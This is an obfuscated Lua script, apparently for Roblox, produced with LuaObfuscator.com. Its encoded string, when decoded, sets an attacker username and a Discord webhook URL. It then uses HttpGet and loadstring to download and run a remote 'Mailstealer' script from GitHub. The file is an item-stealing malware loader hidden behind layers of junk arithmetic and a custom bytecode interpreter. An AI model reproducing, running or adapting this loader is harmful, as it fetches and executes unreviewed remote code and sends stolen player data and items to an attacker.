--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v76=v5(v69,v19);v19=nil;return v76;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/(2^(v32-(2 -1))))%(((1 + 4) -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v70-(v70%1) ;else local v71=((1810 -(282 + 595)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v71 + v71))>=v71) and (928 -(214 + 713))) or (0 + (1637 -(1523 + 114))) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37=1065 -(68 + 997) ;local v38;local v39;local v40;local v41;while true do if (v37==(1271 -(226 + 1044))) then return (v41 * (73054774 -56277558)) + (v40 * (65653 -(32 + 85))) + (v39 * ((460 -209) + (355 -(87 + 263)))) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;v37=1 -0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,181 -((257 -190) + 113) ,15 + 5 ) * ((4 -2)^(24 + 8))) + v42 ;local v46=v20(v43,83 -62 ,983 -((1593 -(368 + 423)) + 150) );local v47=((v20(v43,32)==(2 -(3 -2))) and  -(1 -0)) or (1 + 0) ;if (v46==(997 -(915 + 82))) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=1;v44=0;end elseif (v46==(2691 -644)) then return ((v45==(1187 -(1069 + (376 -258)))) and (v47 * ((2 -1)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(178 + (863 -(10 + 8))) ) * (v44 + (v45/((3 -(1 + 0))^(52 + 0)))) ;end local function v25(v48)local v49;if  not v48 then local v72=0 -0 ;while true do if (v72==(438 -(145 + 293))) then v48=v23();if (v48==(430 -(44 + 386))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v67=1487 -(318 + 680 + 488) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (2==v51) then v56=nil;v57=nil;v51=3;end if (v51==1) then v54=nil;v55=nil;v51=1765 -(454 + 1309) ;end if (v51==(0 + 0)) then v52=0;v53=nil;v51=1;end if (v51~=3) then else v58=nil;v59=nil;v51=5 -1 ;end if (v51==(4 -0)) then while true do if (v52~=3) then else v59=nil;while true do local v95=0 -0 ;local v96;while true do if ((285 -(134 + 151))~=v95) then else v96=1665 -(970 + 695) ;while true do if (v96==(0 -0)) then if (v53~=(1990 -(582 + 1408))) then else local v146=0;while true do if (v146==1) then v56={};v53=1;break;end if (v146==(0 -0)) then v54={};v55={};v146=1 -0 ;end end end if (v53==1) then local v147=0 -0 ;local v148;while true do if (v147==(1824 -(1195 + 629))) then v148=0 -0 ;while true do if (v148~=(242 -(187 + 54))) then else v59={};v53=782 -(162 + 618) ;break;end if (v148==(0 + 0)) then v57={v54,v55,nil,v56};v58=v23();v148=1;end end break;end end end v96=1 + 0 ;end if ((1637 -(1373 + 263))==v96) then if ((1003 -(451 + 549))~=v53) then else local v149=0 + 0 ;while true do if (0~=v149) then else for v171=1 -0 ,v23() do v55[v171-1 ]=v28();end return v57;end end end if (v53==2) then for v155=1 -0 ,v58 do local v156=1384 -(746 + 638) ;local v157;local v158;local v159;local v160;while true do if (0==v156) then v157=0;v158=nil;v156=1;end if (v156~=(1 + 0)) then else local v173=0;while true do if (v173~=(1 -0)) then else v156=343 -(218 + 123) ;break;end if (v173==(1581 -(1535 + 46))) then v159=nil;v160=nil;v173=1;end end end if (v156==2) then while true do if (v157~=0) then else local v180=0;local v181;while true do if (v180~=(0 + 0)) then else v181=0 + 0 ;while true do if (v181==(560 -(306 + 254))) then v158=0 + 0 ;v159=nil;v181=1 -0 ;end if (v181~=1) then else v157=1;break;end end break;end end end if (v157==(1468 -(899 + 568))) then v160=nil;while true do if (v158==(1 + 0)) then if (v159==(2 -1)) then v160=v21()~=0 ;elseif (v159==2) then v160=v24();elseif (v159==3) then v160=v25();end v59[v155]=v160;break;end if (v158==0) then local v184=603 -(268 + 335) ;local v185;while true do if (v184==(290 -(60 + 230))) then v185=572 -(426 + 146) ;while true do if (v185~=0) then else local v194=0 + 0 ;while true do if (v194==1) then v185=1;break;end if (v194~=(1456 -(282 + 1174))) then else v159=v21();v160=nil;v194=1;end end end if (v185~=(812 -(569 + 242))) then else v158=1;break;end end break;end end end end break;end end break;end end end v57[3]=v21();for v161=2 -1 ,v23() do local v162=0 + 0 ;local v163;while true do if (v162==0) then v163=v21();if (v20(v163,1,1)~=0) then else local v174=1024 -(706 + 318) ;local v175;local v176;local v177;local v178;local v179;while true do if ((1253 -(721 + 530))==v174) then v179=nil;while true do if (0~=v175) then else local v186=0;while true do if (v186==1) then v175=1;break;end if (v186==0) then local v188=1271 -(945 + 326) ;while true do if (v188==(0 -0)) then v176=0 + 0 ;v177=nil;v188=701 -(271 + 429) ;end if (v188==(1 + 0)) then v186=1501 -(1408 + 92) ;break;end end end end end if (v175==(1088 -(461 + 625))) then while true do if (v176~=3) then else if (v20(v178,3,1291 -(993 + 295) )==(1 + 0)) then v179[1175 -(418 + 753) ]=v59[v179[4]];end v54[v161]=v179;break;end if (v176~=(1 + 1)) then else local v190=0;local v191;while true do if (v190==(0 + 0)) then v191=0 + 0 ;while true do if (v191==(0 + 0)) then local v198=0;while true do if (v198~=(529 -(406 + 123))) then else if (v20(v178,1770 -(1749 + 20) ,1)~=1) then else v179[1 + 1 ]=v59[v179[1324 -(1249 + 73) ]];end if (v20(v178,1 + 1 ,1147 -(466 + 679) )==(2 -1)) then v179[3]=v59[v179[3]];end v198=1;end if (v198~=(2 -1)) then else v191=1901 -(106 + 1794) ;break;end end end if ((1 + 0)==v191) then v176=3;break;end end break;end end end if (v176==1) then local v192=0 + 0 ;while true do if (v192==(2 -1)) then v176=5 -3 ;break;end if (v192==(114 -(4 + 110))) then local v197=584 -(57 + 527) ;while true do if (v197==1) then v192=1;break;end if (v197==(1427 -(41 + 1386))) then v179={v22(),v22(),nil,nil};if (v177==(0 + 0)) then local v199=0;local v200;while true do if (v199~=(0 -0)) then else v200=0;while true do if (v200~=(0 -0)) then else v179[3]=v22();v179[170 -(122 + 44) ]=v22();break;end end break;end end elseif (v177==(1 -0)) then v179[3]=v23();elseif (v177==(6 -4)) then v179[3 + 0 ]=v23() -((1 + 1)^16) ;elseif (v177==(5 -2)) then local v209=0;local v210;while true do if (v209==0) then v210=65 -(30 + 35) ;while true do if (v210~=0) then else v179[3 + 0 ]=v23() -((1259 -(1043 + 214))^16) ;v179[4]=v22();break;end end break;end end end v197=3 -2 ;end end end end end if (v176~=0) then else local v193=1212 -(323 + 889) ;while true do if (v193==0) then v177=v20(v163,2,3);v178=v20(v163,10 -6 ,6);v193=1;end if (v193==(581 -(361 + 219))) then v176=1;break;end end end end break;end if (v175==(321 -(53 + 267))) then local v187=0;while true do if (v187==(0 + 0)) then v178=nil;v179=nil;v187=414 -(15 + 398) ;end if (v187==(983 -(18 + 964))) then v175=7 -5 ;break;end end end end break;end if (v174~=0) then else local v182=0 + 0 ;while true do if (v182==1) then v174=1 + 0 ;break;end if (v182==(850 -(20 + 830))) then v175=0 + 0 ;v176=nil;v182=1;end end end if (v174==(127 -(116 + 10))) then v177=nil;v178=nil;v174=2;end end end break;end end end v53=1 + 2 ;end break;end end break;end end end break;end if (v52==1) then v55=nil;v56=nil;v52=2;end if (0~=v52) then else local v94=738 -(542 + 196) ;while true do if (v94==0) then v53=0 -0 ;v54=nil;v94=1;end if (v94~=(1 + 0)) then else v52=1;break;end end end if (v52~=2) then else v57=nil;v58=nil;v52=2 + 1 ;end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (1==v63) then v66=v60[3];return function(...)local v77=v64;local v78=v65;local v79=v66;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=5) then if (v90<=2) then if (v90<=0) then local v101;local v102,v103;local v104;local v105;v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];if ((v89[3]=="_ENV") or (v89[3]=="getfenv")) then v87[v89[2]]=v62;else v87[v89[2]]=v62[v89[3]];end v81=v81 + 1 ;v89=v77[v81];if ((v89[3]=="_ENV") or (v89[3]=="getfenv")) then v87[v89[2]]=v62;else v87[v89[2]]=v62[v89[3]];end v81=v81 + 1 ;v89=v77[v81];v105=v89[2];v104=v87[v89[3]];v87[v105 + 1 ]=v104;v87[v105]=v104[v89[4]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v105=v89[2];v102,v103=v80(v87[v105](v13(v87,v105 + 1 ,v89[3])));v82=(v103 + v105) -1 ;v101=0;for v117=v105,v82 do v101=v101 + 1 ;v87[v117]=v102[v101];end v81=v81 + 1 ;v89=v77[v81];v105=v89[2];v87[v105]=v87[v105](v13(v87,v105 + 1 ,v82));v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]();v81=v81 + 1 ;v89=v77[v81];v81=v89[3];elseif (v90==1) then v81=v89[3];else local v127=0;local v128;while true do if (0==v127) then v128=v89[2];v87[v128]=v87[v128](v13(v87,v128 + 1 ,v82));break;end end end elseif (v90<=3) then do return;end elseif (v90>4) then v87[v89[2]]();elseif (v87[v89[2]]==v89[4]) then v81=v81 + 1 ;else v81=v89[3];end elseif (v90<=8) then if (v90<=6) then v87[v89[2]]=v89[3];elseif (v90==7) then local v129=0;local v130;local v131;while true do if (v129==0) then v130=v89[2];v131=v87[v89[3]];v129=1;end if (v129==1) then v87[v130 + 1 ]=v131;v87[v130]=v131[v89[4]];break;end end else local v132=v89[2];local v133,v134=v80(v87[v132](v13(v87,v132 + 1 ,v89[3])));v82=(v134 + v132) -1 ;local v135=0;for v143=v132,v82 do v135=v135 + 1 ;v87[v143]=v133[v135];end end elseif (v90<=10) then if (v90==9) then if ((v89[3]=="_ENV") or (v89[3]=="getfenv")) then v87[v89[2]]=v62;else v87[v89[2]]=v62[v89[3]];end else v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v81=v89[3];end elseif (v90>11) then v87[v89[2]]=v89[3]~=0 ;else v62[v89[3]]=v87[v89[2]];end v81=v81 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65030B3O0072616E67656D616E31323803073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3139363731333431373634363534323932382F6237626F55365A2O2D766643614930516762486B644C657A587938327242697631524B716465426F455157482D76374B706A42497554336F50537967656E68365A35493000163O0012063O00013O0026043O000D000100020004013O000D00012O000C00015O00122O000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026043O0001000100010004013O00010001001206000100093O00120A000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00033O00017O00",v9(),...);
